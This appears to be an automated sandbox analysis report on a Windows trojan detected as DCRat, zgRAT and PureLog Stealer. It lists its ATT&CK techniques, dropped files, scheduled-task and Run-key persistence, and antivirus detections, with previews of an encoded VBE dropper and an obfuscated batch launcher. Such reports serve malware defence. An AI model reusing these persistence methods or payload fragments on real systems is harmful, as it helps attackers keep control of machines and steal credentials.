                                    Source: Yara matchFile source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts11
                                    Windows Management Instrumentation                                    		1
                                    Scheduled Task/Job                                    		11
                                    Process Injection                                    		141
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		1
                                    Taint Shared Content                                    		1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		11
                                    Scripting                                    		1
                                    Scheduled Task/Job                                    		1
                                    Disable or Modify Tools                                    		LSASS Memory121
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job                                    		31
                                    Registry Run Keys / Startup Folder                                    		31
                                    Registry Run Keys / Startup Folder                                    		31
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager1
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		NTDS31
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets3
                                    File and Directory Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information                                    		Cached Domain Credentials37
                                    System Information Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                                    Software Packing                                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                    File Deletion                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1587305 Sample: 7aHY4r6vXR.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 68 Found malware configuration 2->68 70 Antivirus detection for dropped file 2->70 72 Antivirus / Scanner detection for submitted sample 2->72 74 13 other signatures 2->74 10 7aHY4r6vXR.exe 3 6 2->10         started        13 SfLAFHFXIbHzHGgilQgXtKOw.exe 2 2->13         started        16 SfLAFHFXIbHzHGgilQgXtKOw.exe 2->16         started        18 5 other processes 2->18 process3 file4 64 C:\...\bridgeServerFontSavesMonitor.exe, PE32 10->64 dropped 66 WiJ0Q2cIafyWfcOMJ8...DELulT2kNl2MWww.vbe, data 10->66 dropped 20 wscript.exe 1 10->20         started        94 Multi AV Scanner detection for dropped file 13->94 signatures5 process6 signatures7 78 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->78 23 cmd.exe 1 20->23         started        process8 process9 25 bridgeServerFontSavesMonitor.exe 8 27 23->25         started        29 conhost.exe 23->29         started        file10 56 C:\Windows\...\SfLAFHFXIbHzHGgilQgXtKOw.exe, PE32 25->56 dropped 58 C:\Windows\SchCache\RuntimeBroker.exe, PE32 25->58 dropped 60 C:\Windows\...\SfLAFHFXIbHzHGgilQgXtKOw.exe, PE32 25->60 dropped 62 8 other malicious files 25->62 dropped 86 Antivirus detection for dropped file 25->86 88 Multi AV Scanner detection for dropped file 25->88 90 Creates an undocumented autostart registry key 25->90 92 6 other signatures 25->92 31 cmd.exe 25->31         started        33 csc.exe 4 25->33         started        37 schtasks.exe 25->37         started        39 17 other processes 25->39 signatures11 process12 file13 41 SfLAFHFXIbHzHGgilQgXtKOw.exe 31->41         started        44 conhost.exe 31->44         started        46 chcp.com 31->46         started        48 w32tm.exe 31->48         started        54 C:\Windows\...\SecurityHealthSystray.exe, PE32 33->54 dropped 76 Infects executable files (exe, dll, sys, html) 33->76 50 conhost.exe 33->50         started        52 cvtres.exe 1 33->52         started        signatures14 process15 signatures16 80 Antivirus detection for dropped file 41->80 82 Multi AV Scanner detection for dropped file 41->82 84 Machine Learning detection for dropped file 41->84

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    7aHY4r6vXR.exe48%VirustotalBrowse
                                    7aHY4r6vXR.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    7aHY4r6vXR.exe100%AviraVBS/Runner.VPG
                                    7aHY4r6vXR.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%AviraHEUR/AGEN.1339906
                                    C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\ARUSTYfT.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\riACjval.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat100%AviraBAT/Delbat.C
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%AviraHEUR/AGEN.1339906
                                    C:\Windows\SchCache\RuntimeBroker.exe100%AviraHEUR/AGEN.1339906
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\hzhmzTUD.log100%Joe Sandbox ML
                                    C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ARUSTYfT.log100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%Joe Sandbox ML
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe100%Joe Sandbox ML
                                    C:\Windows\SchCache\RuntimeBroker.exe100%Joe Sandbox ML
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe60%VirustotalBrowse
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe60%VirustotalBrowse
                                    C:\Users\user\Desktop\ARUSTYfT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\ARUSTYfT.log69%VirustotalBrowse
                                    C:\Users\user\Desktop\VObntHLa.log25%ReversingLabs
                                    C:\Users\user\Desktop\VObntHLa.log35%VirustotalBrowse
                                    C:\Users\user\Desktop\hzhmzTUD.log8%ReversingLabs
                                    C:\Users\user\Desktop\hzhmzTUD.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\riACjval.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\SchCache\RuntimeBroker.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1587305
                                      Start date and time:2025-01-10 05:41:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 51s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:46
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:7aHY4r6vXR.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:ccd01051f9e8bf3301b3bdd406f0bc24.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@45/29@0/0
                                      EGA Information:
                                      • Successful, ratio: 30%
                                      HCA Information:
                                      • Successful, ratio: 53%
                                      • Number of executed functions: 474
                                      • Number of non-executed functions: 98
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 184.28.90.27, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, 506691cm.renyash.ru, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 1748 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 6644 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 7576 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 8120 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 7352 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 7364 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 8036 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:42:16Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:17Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:17Task SchedulerRun new task: SfLAFHFXIbHzHGgilQgXtKOw path: "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:17Task SchedulerRun new task: SfLAFHFXIbHzHGgilQgXtKOwS path: "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:19Task SchedulerRun new task: bridgeServerFontSavesMonitor path: "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:19Task SchedulerRun new task: bridgeServerFontSavesMonitorb path: "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:43:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:43:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:16AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:43:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:43:41AutostartRun: WinLogon Shell "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:49AutostartRun: WinLogon Shell "C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:57AutostartRun: WinLogon Shell "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:44:05AutostartRun: WinLogon Shell "C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:44:13AutostartRun: WinLogon Shell "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:44:21AutostartRun: WinLogon Shell "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\Desktop\ARUSTYfT.log0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                              Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        onlysteal.exeGet hashmaliciousDCRatBrowse

                                                          Created / dropped Files

                                                          C:\ChainBroker\5a6d6b3e5e3059

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (871), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):871
                                                          Entropy (8bit):5.902075817109225
                                                          Encrypted:false
                                                          SSDEEP:24:9xkrx39CWaxjUv2dP9SP/al8dmOQrmjG5JEC61v:9xkrxN6mv2dlJYbVjiJEB
                                                          MD5:7FA44E00D4EB831D3134C382ABD96AFA
                                                          SHA1:A09C17507669C4331A994A90D63F43E53464C0BE
                                                          SHA-256:F6D31FD6F93AE1785D660A505A44869A38C6D7F56C11AC716C561752D70D813E
                                                          SHA-512:4B1B005D379A2AF72404421B27BD5F8F44E8290D38CF429CB2A4CD1AF7418CBC791A1B7D3958F4ECD8C89E70F0A80CE45C52569953EFC15E7835A74320A88F28
                                                          Malicious:false
                                                          Preview:aM6BNeCvEXQhMD0W1VJkDVJrgWS48Qc2WoD6YKtyItKL0fq6gRBLg6yEDOf0MHwy4YLhA37qmVbTL70BpVXrOQWZ093Jp2mA6WQcUJ6mTVjKee2FYdL0uEjoBvrAAxAutbXyqXrgZvY3rL4VGxvLrvQ1wmbib5mgUzbDHDYAwoa9qq7z0W3MBzC7KfCE6IEdI1j1u1NCZuZCURLGolsFCZefwd2mBUEnj70zHFF9I0xQZ9m3U5ZVa9btXDER8lAEqwdXbV9jfs7LlNFw09RG4sMkgHcDAyAgztkngPc860zrBPHJ8Ra9U4J8j21T36irrbW2ncQlgTKE2fiQ9SFsYBM5jlEnXIEASIAk3OfgBycAuFFDUkTl0zTpObTBXmNYPKwtf7XvwirjjLKefATwydJczUVc5eIZlEvkSViXNiySHtGDQzfXTbjwBT4Kl40SaS8fakLJb6iQo1VFOSLF8vFKe9j9bXvTsg1zvkmpnW5X2THJ8y6SsuUpMyAaBMsEKPhI9fTnpfcmzrRL1ZAmack8LMm7jLobn1Mmv9KdfTnMRszegzjlMFnspj6x2VDd1B88epa2OhHHzXqdWIbumCPhOe6MCXkJPJVQt090YrXo8f2S2dau4T1yvauAsOz1671qBZtgIkV5pkjsloTj60O5RheTG9HK1fsAoMQct4lT85IL1CYE4Q4Fs5Ye5aaIcKDK1iEYY0zCP47VYSbDkDPlknRsyvhTdc0x18UT89qDa10x8CFm8WiZ4cjNQWkmTgjwEKda8IFlWMKtxdtvq5UH4b2ZYGClZDu4SDtxipnzQ7CsS0awmy6XLb1mSEB1GdLSbQatt6MASe17YJHipQ9kHXt1MHfenvtwvtR

                                                          C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):101
                                                          Entropy (8bit):5.186248210470621
                                                          Encrypted:false
                                                          SSDEEP:3:s3IhoXw2EAHoAE5BCAnDAXwYvQQKb4cxAJA:s4hoXJiAaBDcAsv5+
                                                          MD5:746D44098AB92E627CEBE72CFA9C560D
                                                          SHA1:B51342547C4B9227DF75ED19D60C462827F83204
                                                          SHA-256:7CA477B6F171461FA1B2AE2350A938B518D4323A03D4ACC95DED7B4F518D1147
                                                          SHA-512:B5F3DAA4BEE7A3317C1BF23B0C0D12861742328478C31B7714798B5BE7ECD7AC6CC799532103DB9A8A2A0D90A347B553B92F9CBFAD43B2E19E57A16029449B03
                                                          Malicious:false
                                                          Preview:%lRKYody%%yftcuPKMMW%..%BUwdVVcSZJqB%"C:\ChainBroker/bridgeServerFontSavesMonitor.exe"%bCOwNyJisKelb%

                                                          C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):241
                                                          Entropy (8bit):5.903171335373703
                                                          Encrypted:false
                                                          SSDEEP:6:GogwqK+NkLzWbH9WF08nZNDd3RL1wQJRimhclR4Pe5Xkt3JhC+Es:GyMCzWL74d3XBJbhcl2mM97
                                                          MD5:EE1D4DD46A1CB9B8DCF5841DAE6BBC93
                                                          SHA1:7B5F9134A578673858B826C698DC0360DB7D565F
                                                          SHA-256:D2C34E5DA842BF7ECB384880D6DBF05DFFD1E59775961E017A281E3958F0B434
                                                          SHA-512:9D1DB891B0589E02812632D92EC297AE526ABDEB7D37367728C0B6CFDEB0FF34ACD9F5D8833654984FCEC124C328EB41E4AC805FB1F6D9477E2933731EED02B3
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^2AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZ4mk.ADK3..zJq.4jveC0X.;-p&Ebd^Glyq4AA.tqOqOwSiV$W-{7Xs$Ww6X/8..H (lDJ~,!B~0mVd+R0UAAA==^#~@.

                                                          C:\ChainBroker\bridgeServerFontSavesMonitor.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          • Antivirus: Virustotal, Detection: 60%, Browse
